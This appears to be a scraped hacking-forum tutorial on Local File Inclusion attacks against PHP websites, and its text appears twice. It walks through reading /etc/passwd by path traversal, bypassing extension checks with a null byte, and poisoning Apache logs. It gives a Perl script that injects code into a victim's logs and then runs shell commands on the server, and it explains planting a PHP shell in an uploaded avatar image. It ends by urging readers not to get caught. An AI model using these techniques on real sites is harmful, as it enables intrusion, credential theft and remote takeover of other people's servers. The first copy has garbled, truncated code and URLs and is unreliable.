LFI Tutorial
Hello p0wersurge, this is DubKing with a LFI Tutorial.
let's check the code that makes it vuln:
second let's explain the "LFI"
wich is in long terms:
"Local File Inclusion" wich means you can access other files of the website by using the part in the url
example:
if we got a site like
www.example.com/test/index.php?page=home
you might be able to exploit it like if there is another file on the same site
let's say "example/index.php"
you can access it by going to
"www.example.com/test/index.php?page=../example/index.php"
If said website was hosted on a unix server, then we might be able to do a directory transversal to the password file. To test, we could go to:http://www.example.com/test/index.ph.../../etc/passwd
If it worked, the page should look something like:
An example of said file, would be:
Although, the password may be shadowed, if it is, it will look something like
The password in that example, would be located in /etc/shadow (Which you will most likely not have access to, because it is mainly only readable/writeable by root. But /etc/passwd is readable by many proccesses, therefore thats why you are able to read it.
If you see something like
Then you would know that the password is stored in /etc/security/passwd
A few good directories to visit would be
Something that web admins try and do to fix that problem is to just make sure the website adds ".php" to the end of the URL. So if you were to try going to http://www.example.com/test/index.ph.../../etc/passwd, it would try and bring you to http://www.example.com/test/index.ph...etc/passwd.php. Which is non existant, since the file we are looking for isn't a php file. But to fix that, we could just use a nullbyte. To use a nullbyte, you just have to add "" to the end of the URL before you send it.
The nullbyte makes it so that anything entered in after the nullbyte is "null"
There are plenty of other ways to use LFI to exploit a webserver. In the following, we will inject php code into the httpd logs, and access them via LFI.
That is a list of log locations. Now that we know where the logs are, we will look inside them, and see what they store. In this example, we will use a log that stores "not found files" and the php code. You will then type into your browser www.example.com/ and the php code will be logged, because it doesn't exist. This may not work, beacuse the log may URL encode it. If you don't have your own script you can use one I found on the internet.
Save that as something.pl. If the vulnerable code is in example.com/test/test.php you should change the /folder/ to /test/ , index.php= to test.php= and the ../../../../../../../etc/httpd/logs/error_log to where the log is at!
That script will inject the code, and then will allow you to run a comand on the server.
Lastly, we will look at how you can exploit the avatar uploading feature of a website with LFI.
You will need to add the php code you want to execute into the image, to do with, you will need to use a hex editor and add it in at the end. Or you could use a progam called edjpgcom. For that all you need to do is right click on an amiage > open with > then select the edjpgcom program, then type the code to inject you shell. Once you have your shell in the image, you will need to upload your shell into the server through the avatar upload thing in the user CP. If its not a forum you are trying to exploit, and there is no way to upload a file. Check if its a shared hosting server. To do that, do a reverse lookup on the website. The website I use for this is: http://www.yougetsig...-on-web-server/
Now, the tricky part, you need to find the location of the image, by creating an error in the image. But, if you can't force an error on the image, you can try right clicking on the image, copying the image location, putting it into the URL, and adding a "?" to the end. (The ? Will cause it to run, and the is the nullbyte"
If those don't work, you can go back to the /etc/passwd file
As you can see, the username is alos a directory, in most cases the name is similar to the domain, if not though, you will have to try them until you find the one your looking for.
Go back to your avatar image, right click on it, then copy image location.
In your browser, go back to http://www.example.com/test/index.ph...your/image.jpg
And after that, you should see the shell you added into your image earlier.
Good luck, and have fun. Try not to get caught.
let's check the code that makes it vuln:
Code:
$page = $_GET[page]; include($page); ?>
wich is in long terms:
"Local File Inclusion" wich means you can access other files of the website by using the part in the url
example:
if we got a site like
www.example.com/test/index.php?page=home
you might be able to exploit it like if there is another file on the same site
let's say "example/index.php"
you can access it by going to
"www.example.com/test/index.php?page=../example/index.php"
If said website was hosted on a unix server, then we might be able to do a directory transversal to the password file. To test, we could go to:http://www.example.com/test/index.ph.../../etc/passwd
If it worked, the page should look something like:
Code:
username: passwd:UID:GID:full_name:directory:shell
Code:
username:kbeMVnZM0oL7I:503:100:FullName:/home/user name:/bin/sh
Code:
username:x:503:100:FullName:/home/username:/bin/sh
If you see something like
Code:
username:!:503:100:FullName:/home/username:/bin/sh
A few good directories to visit would be
Code:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
The nullbyte makes it so that anything entered in after the nullbyte is "null"
There are plenty of other ways to use LFI to exploit a webserver. In the following, we will inject php code into the httpd logs, and access them via LFI.
Code:
../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../etc/httpd/logs/acces_log ../../../../../../../etc/httpd/logs/acces.log ../../../../../../../etc/httpd/logs/error_log ../../../../../../../etc/httpd/logs/error.log ../../../../../../../var/www/logs/access_log ../../../../../../../var/www/logs/access.log ../../../../../../../usr/local/apache/logs/access_ log ../../../../../../../usr/local/apache/logs/access. log ../../../../../../../var/log/apache/access_log ../../../../../../../var/log/apache2/access_log ../../../../../../../var/log/apache/access.log ../../../../../../../var/log/apache2/access.log ../../../../../../../var/log/access_log ../../../../../../../var/log/access.log ../../../../../../../var/www/logs/error_log ../../../../../../../var/www/logs/error.log ../../../../../../../usr/local/apache/logs/error_l og ../../../../../../../usr/local/apache/logs/error.l og ../../../../../../../var/log/apache/error_log ../../../../../../../var/log/apache2/error_log ../../../../../../../var/log/apache/error.log ../../../../../../../var/log/apache2/error.log ../../../../../../../var/log/error_log ../../../../../../../var/log/error.log
Code:
#!/usr/bin/perl -w use IO::Socket; use LWP::UserAgent; $site="victim.com"; $path="/folder/"; $code=""; $log = "../../../../../../../etc/httpd/logs/error_log"; print "Trying to inject the code"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die " Connection Failed. "; print $socket "GET ".$path.$code." HTTP/1.1 "; print $socket "User-Agent: ".$code." "; print $socket "Host: ".$site." "; print $socket "Connection: close "; close($socket); print " Code $code sucssefully injected in $log "; print " Type command to run or exit to end: "; $cmd = ; while($cmd !~ "exit") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die " Connection Failed. "; print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1 "; print $socket "Host: ".$site." "; print $socket "Accept: */* "; print $socket "Connection: close "; while ($show = <$socket>) { print $show; } print "Type command to run or exit to end: "; $cmd = ; }
That script will inject the code, and then will allow you to run a comand on the server.
Lastly, we will look at how you can exploit the avatar uploading feature of a website with LFI.
You will need to add the php code you want to execute into the image, to do with, you will need to use a hex editor and add it in at the end. Or you could use a progam called edjpgcom. For that all you need to do is right click on an amiage > open with > then select the edjpgcom program, then type the code to inject you shell. Once you have your shell in the image, you will need to upload your shell into the server through the avatar upload thing in the user CP. If its not a forum you are trying to exploit, and there is no way to upload a file. Check if its a shared hosting server. To do that, do a reverse lookup on the website. The website I use for this is: http://www.yougetsig...-on-web-server/
Now, the tricky part, you need to find the location of the image, by creating an error in the image. But, if you can't force an error on the image, you can try right clicking on the image, copying the image location, putting it into the URL, and adding a "?" to the end. (The ? Will cause it to run, and the is the nullbyte"
If those don't work, you can go back to the /etc/passwd file
Code:
username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh
Go back to your avatar image, right click on it, then copy image location.
In your browser, go back to http://www.example.com/test/index.ph...your/image.jpg
And after that, you should see the shell you added into your image earlier.
Good luck, and have fun. Try not to get caught.
Comments
Post a Comment